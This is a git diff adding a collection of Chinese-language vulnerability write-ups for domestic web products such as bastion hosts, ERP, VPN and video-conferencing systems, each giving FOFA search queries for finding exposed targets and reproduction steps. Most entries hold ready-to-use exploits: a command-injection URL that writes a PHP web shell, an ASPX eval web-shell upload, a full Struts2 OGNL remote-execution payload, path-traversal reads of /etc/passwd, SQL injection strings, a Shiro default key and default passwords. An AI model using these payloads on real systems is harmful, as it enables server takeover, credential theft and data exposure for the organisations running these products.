diff --git a/Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md b/Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md new file mode 100644 index 0000000..8b77427 --- /dev/null +++ b/Web应用漏洞/中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞.md @@ -0,0 +1,63 @@ +# 中远麒麟 iAudit堡垒机 get_luser_by_sshport.php 远程命令执行漏洞 + +## 漏洞描述 + +中远麒麟 iAudit堡垒机 get_luser_by_sshport.php文件存在命令拼接,攻击者通过漏洞可获取服务器权限 + +## 漏洞影响 + +``` +中远麒麟 iAudit堡垒机 +``` + +## FOFA + +``` +cert.subject="Baolei" +``` + +## 漏洞复现 + +登录页面如下 + +![image-20220525100240635](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251002739.png) + +出现漏洞的文件为 get_luser_by_sshport.php + +``` + +``` + +其中 clientip存在命令拼接 使用 ; 分割命令就可以执行任意命令 + +Web目录默认为 `/opt/freesvr/web/htdocs/freesvr/audit/` + +发送Payload + +``` +https://xxx.xxx.xxx.xxx/get_luser_by_sshport.php?clientip=1;echo+%27%3C?php%20var_dump(shell_exec($_GET[cmd]));?%3E%27%3E/opt/freesvr/web/htdocs/freesvr/audit/test.php;&clientport=1 +``` + +![image-20220525100301367](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251003398.png) + +再访问写入的文件执行命令 + +![image-20220525100311413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251003445.png) \ No newline at end of file diff --git a/Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md b/Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md new file mode 100644 index 0000000..04b675f --- /dev/null +++ b/Web应用漏洞/云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞.md @@ -0,0 +1,32 @@ +# 云时空 社会化商业ERP系统 Shiro框架 远程命令执行漏洞 + +## 漏洞描述 + +云时空 社会化商业ERP为 Shiro框架 ,使用了默认的密钥导致了远程命令执行漏洞 + +## 漏洞影响 + +``` +云时空 社会化商业ERP系统 +``` + +## FOFA + +``` +title="云时空社会化商业ERP" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251024908.png) + +默认密钥为 + +``` +kPH+bIxk5D2deZiIxcaaaA== +``` + +![image-20220525102542474](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251025549.png) + diff --git a/Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md b/Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md new file mode 100644 index 0000000..798efc3 --- /dev/null +++ b/Web应用漏洞/云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞.md @@ -0,0 +1,31 @@ +# 云时空 社会化商业ERP系统 validateLoginName SQL注入漏洞 + +## 漏洞描述 + +云时空 社会化商业ERP系统存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息 + +## 漏洞影响 + +``` +云时空 社会化商业ERP系统 +``` + +## FOFA + +``` +title="云时空社会化商业ERP" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525102459840](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251026873.png) + +使用SQLmap验证漏洞 + +``` +sqlmap -u "http://xxx.xxx.xxx.xxx/sys/user/validateLoginName?loginName=admin" +``` + +![image-20220525103355733](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251033940.png) \ No newline at end of file diff --git a/Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md b/Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md new file mode 100644 index 0000000..cb94aea --- /dev/null +++ b/Web应用漏洞/众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞.md @@ -0,0 +1,33 @@ +# 众望网络 微议管理系统 后台updatefile.html 任意文件上传漏洞 + +## 漏洞描述 + +众望网络 微议管理系统 后台updatefile.html页面任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件控制服务器 + +## 漏洞影响 + +``` +众望网络 微议管理系统 +``` + +## FOFA + +``` +"微议管理系统" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525103602413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251036461.png) + +默认口令 amdin/admin, 服务器更新界面上传PHP文件 + +![image-20220525103740928](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251037014.png) + +访问页面 + +``` +/Updatefiles/文件名.php +``` \ No newline at end of file diff --git a/Web应用漏洞/信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md b/Web应用漏洞/信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md new file mode 100644 index 0000000..c5c21c3 --- /dev/null +++ b/Web应用漏洞/信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞.md @@ -0,0 +1,57 @@ +# 信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 后台命令执行漏洞 + +## 漏洞描述 + +信诺瑞得 WiseGrid慧敏应用交付网关 sysadmin_action.php 对应的ping功能存在后台命令执行漏洞,通过默认口令可以获取系统权限 + +## 漏洞影响 + +``` +信诺瑞得 WiseGrid慧敏应用交付网关 +``` + +## FOFA + +``` +app="WiseGrid慧敏应用交付网关" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525143430650](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251434774.png) + +默认口令 + +``` +ssh:root/sinogrid +web: admin/sinogrid +``` + +``` +![2](C:/Users/47236/Desktop/2.png)![2](C:/Users/47236/Desktop/2.png)POST /bin/sysadmin_action.php?action=getinfo&operation=ping&destination_value=`id`&ping_count=3&sar_value=3&netstat_value=tcp&interface= HTTP/1.1 +Host: +Cookie: PHPSESSID=4510o12llugti8k4f24971rdf2; funcs=NNN; appversion=WiseGrid-V4.2.2R_17322; hbstate=alone; username=admin; passwordmd5=ef9ffdf6c1e2fe91d4e14b30323fb771; role=superadmin; authmode=LOCAL; session_time=1639643323; lang=zh; declaration=1; needSyn=false +Content-Length: 0 +Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="96", "Google Chrome";v="96" +Accept: */* +X-Requested-With: XMLHttpRequest +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36 +Sec-Ch-Ua-Platform: "macOS" +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 +X-Forwarded-For: 127.0.0.1 +X-Originating-Ip: 127.0.0.1 +X-Remote-Ip: 127.0.0.1 +X-Remote-Addr: 127.0.0.1 +Connection: close +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251433134.png) + +![]()![2](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251434769.png) \ No newline at end of file diff --git a/Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md b/Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md new file mode 100644 index 0000000..f79a4e7 --- /dev/null +++ b/Web应用漏洞/吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞.md @@ -0,0 +1,29 @@ +# 吉拉科技 LVS精益价值管理系统 Business 目录遍历漏洞 + +## 漏洞描述 + +杭州吉拉科技有限公司多个系统存在目录遍历漏洞,由于 /Business/ 访问控制不严,攻击者可利用该漏洞获取敏感信息。 + +## 漏洞影响 + +吉拉科技 LVS精益价值管理系统 + +## FOFA + +``` +"Supperd By 吉拉科技" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525143613247](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251436458.png) + +验证POC + +``` +/Business/ +``` + +![image-20220525143712687](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251437757.png) \ No newline at end of file diff --git a/Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md b/Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md new file mode 100644 index 0000000..0fdc473 --- /dev/null +++ b/Web应用漏洞/昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 昆石网络 VOS3000虚拟运营支撑系统 %c0%ae%c0%ae 任意文件读取漏洞 + +## 漏洞描述 + +昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞 + +## 漏洞影响 + +``` +昆石网络 VOS3000虚拟运营支撑系统 +``` + +## FOFA + +``` +app="VOS-VOS3000" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525144202606](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251442673.png) + +验证POC + +``` +/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251443278.png) \ No newline at end of file diff --git a/Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md b/Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md new file mode 100644 index 0000000..b4ca6ef --- /dev/null +++ b/Web应用漏洞/汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞.md @@ -0,0 +1,31 @@ +# 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞 + +## 漏洞描述 + +汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息 + +## 漏洞影响 + +``` +汇文v5.6 +``` + +## FOFA + +``` +app="汇文软件-书目检索系统" +``` + +## 漏洞复现 + +主页面 + +![image-20220525144642895](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251446991.png) + +验证POC + +``` +/include/config.properties +``` + +![image-20220525144530183](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251445229.png) \ No newline at end of file diff --git a/Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md b/Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md new file mode 100644 index 0000000..36c77fe --- /dev/null +++ b/Web应用漏洞/深信服 应用交付报表系统 download.php 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 深信服 应用交付报表系统 download.php 任意文件读取漏洞 + +## 漏洞描述 + +深信服 应用交付报表系统 download.php文件存在任意文件读取漏洞,攻击者通过漏洞可以下载服务器任意文件 + +## 漏洞影响 + +``` +深信服 应用交付报表系统 +``` + +## FOFA + +``` +app="SANGFOR-应用交付报表系统" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525144847811](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251448956.png) + +验证POC + +``` +/report/download.php?pdf=../../../../../etc/passwd +``` + +![image-20220525144958637](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251449708.png) \ No newline at end of file diff --git a/Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md b/Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md new file mode 100644 index 0000000..24408c7 --- /dev/null +++ b/Web应用漏洞/深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞.md @@ -0,0 +1,31 @@ +# 深信服 应用交付管理系统 sys_user.conf 账号密码泄漏漏洞 + +## 漏洞描述 + +深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏 + +## 漏洞影响 + +``` +深信服 应用交付管理系统 +``` + +## FOFA + +``` +app="SANGFOR-应用交付管理系统" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145113865](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451936.png) + +验证POC + +``` +/tmp/updateme/sinfor/ad/sys/sys_user.conf +``` + +![image-20220525145136819](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251451862.png) \ No newline at end of file diff --git a/Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md b/Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md new file mode 100644 index 0000000..4f1eca8 --- /dev/null +++ b/Web应用漏洞/畅捷CRM get_usedspace.php SQL注入漏洞.md @@ -0,0 +1,37 @@ +# 畅捷CRM get_usedspace.php SQL注入漏洞 + +## 漏洞描述 + +畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞可获取数据库敏感信息 + +## 漏洞影响 + +``` +畅捷CRM +``` + +## FOFA + +``` +title="畅捷CRM" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145239822](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251452933.png) + +验证POC + +``` +/webservice/get_usedspace.php?site_id=-1159 UNION ALL SELECT CONCAT(0x76756c6e,0x76756c6e,0x76756c6e)-- +``` + +![image-20220525145324633](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251453704.png) + +使用Sqlmap验证漏洞 + +``` +sqlmap -u "http://xxx.xxx.xxx.xxx:8000/webservice/get_usedspace.php?site_id=1" -p site_id +``` \ No newline at end of file diff --git a/Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md b/Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md new file mode 100644 index 0000000..78096f6 --- /dev/null +++ b/Web应用漏洞/科达 MTS转码服务器 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 科达 MTS转码服务器 任意文件读取漏洞 + +## 漏洞描述 + +KEDACOM MTS转码服务器存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息 + +## 漏洞影响 + +``` +MTS转码服务器 +``` + +## FOFA + +``` +app="MTS转码服务器" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145422524](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454625.png) + +验证POC + +``` +/../../../../../../../../etc/passwd +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251454380.png) \ No newline at end of file diff --git a/Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md b/Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md new file mode 100644 index 0000000..ade38ea --- /dev/null +++ b/Web应用漏洞/科达 网络键盘控制台 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 科达 网络键盘控制台 任意文件读取漏洞 + +## 漏洞描述 + +KEDACOM 网络键盘控制台存在任意文件读取漏洞,攻击这通过漏洞可以读取服务器任意信息 + +## 漏洞影响 + +``` +KEDACOM 网络键盘控制台 +``` + +## FOFA + +``` +"网络键盘控制台" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145610413](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456491.png) + +验证POC + +``` +/../../../../../../../../etc/passwd +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251456381.png) \ No newline at end of file diff --git a/Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md b/Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md new file mode 100644 index 0000000..1c6dc6b --- /dev/null +++ b/Web应用漏洞/紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638.md @@ -0,0 +1,31 @@ +# 紫光档案管理系统 editPass.html SQL注入漏洞 CNVD-2021-41638 + +## 漏洞描述 + +紫光软件系统有限公司(以下简称“紫光软件”)是中国领先的行业解决方案和IT服务提供商。 紫光电子档案管理系统存在SQL注入漏洞。攻击者可利用漏洞获取数据库敏感信息。 + +## 漏洞影响 + +``` +紫光电子档案管理系统 +``` + +## FOFA + +``` +app="紫光档案管理系统" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145742607](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251457947.png) + +验证POC + +``` +/login/Login/editPass.html?comid=extractvalue(1,concat(char(126),md5(1))) +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251458637.png) \ No newline at end of file diff --git a/Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md b/Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md new file mode 100644 index 0000000..a577f92 --- /dev/null +++ b/Web应用漏洞/绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞.md @@ -0,0 +1,39 @@ +# 绿盟 BAS日志数据安全性分析系统 accountmanage 未授权访问漏洞 + +## 漏洞描述 + +绿盟 BAS日志数据安全性分析系统存在未授权访问漏洞,通过漏洞可以添加任意账户登录平台获取敏感信息 + +## 漏洞影响 + +``` +绿盟 BAS日志数据安全性分析系统 +``` + +## FOFA + +``` +body="WebApi/encrypt/js-sha1/build/sha1.min.js" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525145937586](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251459725.png) + +未授权页面 + +``` +/accountmanage/index +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500626.png) + +添加用户并登录 + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500966.png) + +使用账户登录后台 + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251500218.png) \ No newline at end of file diff --git a/Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md b/Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md new file mode 100644 index 0000000..d60bb23 --- /dev/null +++ b/Web应用漏洞/绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞.md @@ -0,0 +1,46 @@ +# 绿盟 UTS综合威胁探针 信息泄露登陆绕过漏洞 + +## 漏洞描述 + +绿盟 UTS综合威胁探针 某个接口未做授权导致未授权漏洞 + +## 漏洞影响 + +``` +绿盟 UTS综合威胁探针 +``` + +## FOFA + +``` +app="NSFOCUS-UTS综合威胁探针" +``` + +## 漏洞复现 + +默认口令 + +``` +admin/Nsfocus@123 +auditor/auditor +``` + +登陆页面 + +![image-20220525150142447](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251501583.png) + +验证POC + +``` +/webapi/v1/system/accountmanage/account +``` + +![image-20220525150243440](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251502510.png) + +这里出现了登录的账号以及加密的 PASS + +登陆时的加密字段抓包修改为获取的就可以登陆系统 + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503644.png) + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251503926.png) \ No newline at end of file diff --git a/Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md b/Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md new file mode 100644 index 0000000..c7e070e --- /dev/null +++ b/Web应用漏洞/金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞.md @@ -0,0 +1,67 @@ +# 金山 V8 终端安全系统 get_file_content.php 任意文件读取漏洞 + +## 漏洞描述 + +金山 V8 终端安全系统 存在任意文件读取漏洞,攻击者可以通过漏洞下载服务器任意文件 + +## 漏洞影响 + +``` +金山 V8 终端安全系统 +``` + +## FOFA + +``` +title="在线安装-V8+终端安全系统Web控制台" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525150449778](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251504895.png) + +存在漏洞的文件`/Console/receive_file/get_file_content.php` + +``` + +``` + + + +文件中没有任何的过滤 通过 filepaht 参数即可下载任意文件 + +由于不能出现 `..` ,所以只能读取web目录下的文件 + +``` +POST /receive_file/get_file_content.php + +filepath=login.php +``` + +![image-20220525150700239](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251507315.png) \ No newline at end of file diff --git a/Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md b/Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md new file mode 100644 index 0000000..0220441 --- /dev/null +++ b/Web应用漏洞/金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336.md @@ -0,0 +1,35 @@ +# 金笛 短信中间件Web版 log 后台任意文件下载漏洞 CNVD-2021-57336 + +## 漏洞描述 + +金笛 短信中间件Web版后台存在任意文件下载漏洞,攻击者通过漏洞可以获取服务器任意文件信息 + +## 漏洞影响 + +``` +金笛 短信中间件Web版 +``` + +## FOFA + +``` +app="金笛短信中间件(WEB版)" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525150803211](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508287.png) + +存在漏洞的位置为 日志下载 + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508351.png) + +验证POC + +``` +/log?action=view&pageIndex=1&name=../../../windows/win.ini +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251508651.png) \ No newline at end of file diff --git a/Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md b/Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md new file mode 100644 index 0000000..adb9c84 --- /dev/null +++ b/Web应用漏洞/银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞.md @@ -0,0 +1,31 @@ +# 银达汇智 智慧综合管理平台 FileDownLoad.aspx 任意文件读取漏洞 + +## 漏洞描述 + +银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件 + +## 漏洞影响 + +``` +银达汇智 智慧综合管理平台 +``` + +## FOFA + +``` +"汇智信息" && title="智慧综合管理平台登入" +``` + +## 漏洞复现 + +登陆页面 + +![image-20220525150952244](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251509315.png) + +验证POC + +``` +/Module/FileManagement/FileDownLoad.aspx?filePath=../../web.config +``` + +![image-20220525151256759](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251512861.png) \ No newline at end of file diff --git a/Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞 b/Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞 new file mode 100644 index 0000000..0937df9 --- /dev/null +++ b/Web应用漏洞/银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞 @@ -0,0 +1,58 @@ +# 银达汇智 智慧综合管理平台 FileUp.aspx 任意文件上传漏洞 + +## 漏洞描述 + +银达汇智 智慧综合管理平台 FileDownLoad.aspx 存在任意文件读取漏洞,通过漏洞攻击者可下载服务器中的任意文件 + +## 漏洞影响 + +``` +银达汇智 智慧综合管理平台 +``` + +## FOFA + +``` +"汇智信息" && title=="智慧综合管理平台登入" +``` + +## 漏洞复现 + +登陆页面 + +![image-20220525150952244](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514171.png) + +文件上传请求包 + +``` +POST /Module/FileUpPage/FileUp.aspx?orgid=1&type=NNewsContent HTTP/1.1 +Host: +Accept-Encoding: identity +Content-Length: 337 +Accept-Language: zh-CN,zh;q=0.8 +Accept: */* +User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 +Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3 +Connection: keep-alive +Cache-Control: max-age=0 +Content-Type: multipart/form-data; boundary=62907949903a4c499178971c9dab4ad9 + +--62907949903a4c499178971c9dab4ad9 +Content-Disposition: form-data; name="Filedata"; filename="abc.aspx" +Content-Type: image/jpeg + +<%@ Page Language="Jscript"%><%Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("abc", "MD5").ToLower());eval(Request.Item["cmd"],"unsafe");%> +--62907949903a4c499178971c9dab4ad9-- +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514756.png) + +响应包会返回文件名,上传的目录为 + +``` +/imgnews/imgcontent/1/xxxxxxxxxx.aspx +``` + +![](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251514939.png) + +出现如图成功上传木马,密码为 `cmd` \ No newline at end of file diff --git a/Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md b/Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md new file mode 100644 index 0000000..d5194e2 --- /dev/null +++ b/Web应用漏洞/零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113.md @@ -0,0 +1,51 @@ +# 零视科技 H5S视频平台 GetUserInfo 信息泄漏漏洞 CNVD-2020-67113 + +## 漏洞描述 + +零视技术(上海)有限公司是以领先的视频技术服务于客户,致力于物联网视频开发简单化,依托于HTML5 WebRTC 等新的技术,实现全平台视频播放简单化。 零视技术(上海)有限公司H5S CONSOLE存在未授权访问漏洞。攻击者可利用漏洞访问后台相应端口,执行未授权操作。 + +## 漏洞影响 + +``` +零视科技 H5S视频平台 +``` + +## FOFA + +``` +title="H5S视频平台|WEB" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525151716667](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251517010.png) + +API文档可以未授权访问 + +``` +/doc/api.html +``` + +![image-20220525151757329](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251517406.png) + +存在用户账号密码泄漏的接口 + +``` +/api/v1/GetUserInfo?user=admin&session= +``` + +![image-20220525151838220](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251518256.png) + +其中登录接口中 Password为接口中存在的账号密码,可以直接发送请求获取Cookie + +``` +/api/v1/Login?user=admin&password=827ccb0eea8a706c4c34a16891f84e7b +``` + +![image-20220525151916076](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251519118.png) + +请求成功后访问主页面 + +![image-20220525152043207](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251520302.png) \ No newline at end of file diff --git a/Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md b/Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md new file mode 100644 index 0000000..96b5485 --- /dev/null +++ b/Web应用漏洞/飞视美 视频会议系统 Struts2 远程命令执行漏洞.md @@ -0,0 +1,44 @@ +# 飞视美 视频会议系统 Struts2 远程命令执行漏洞 + +## 漏洞描述 + +飞视美 视频会议系统 Struts2组件存在远程命令执行漏洞,通过漏洞攻击者可执行任意命令获取服务器权限 + +## 漏洞影响 + +``` +飞视美 视频会议系统 +``` + +## FOFA + +``` +app="飞视美-视频会议系统" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525152447274](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251524392.png) + +存在漏洞的路径为 + +``` +/confinfoaction!showallConfinfos.action +``` + +发送请求包 + +``` +POST /confinfoaction!showallConfinfos.action HTTP/1.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 +Content-Type: application/x-www-form-urlencoded +Content-Length: 669 +Host: +Connection: Keep-Alive + +('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g)(('\43mycmd\75\'ipconfig\'')(d))&(h)(('\43myret\75@java.lang.Runtime@getRuntime().exec(\43mycmd)')(d))&(i)(('\43mydat\75new\40java.io.DataInputStream(\43myret.getInputStream())')(d))&(j)(('\43myres\75new\40byte[51020]')(d))&(k)(('\43mydat.readFully(\43myres)')(d))&(l)(('\43mystr\75new\40java.lang.String(\43myres)')(d))&(m)(('\43myout\75@org.apache.struts2.ServletActionContext@getResponse()')(d))&(n)(('\43myout.getWriter().println(\43mystr)')(d)) +``` + +![image-20220525152728933](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251527012.png) \ No newline at end of file diff --git a/Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md b/Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md new file mode 100644 index 0000000..e0caa53 --- /dev/null +++ b/Web应用漏洞/魅课 OM视频会议系统 proxy.php 文件包含漏洞.md @@ -0,0 +1,31 @@ +# 魅课 OM视频会议系统 proxy.php 文件包含漏洞 + +## 漏洞描述 + +魅课OM视频会议系统 proxy.php文件target参数存在本地文件包含漏洞。攻击者可借助该漏洞无需登录便可下载任意文件。 + +## 漏洞影响 + +``` +魅课OM视频会议系统 +``` + +## FOFA + +``` +app="OMEETING-OM视频会议" +``` + +## 漏洞复现 + +登录页面 + +![image-20220525153028849](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205251530024.png) + +验证POC + +``` +/admin/do/proxy.php?method=get&target=../../../../../../../../../../windows/win.ini +``` + 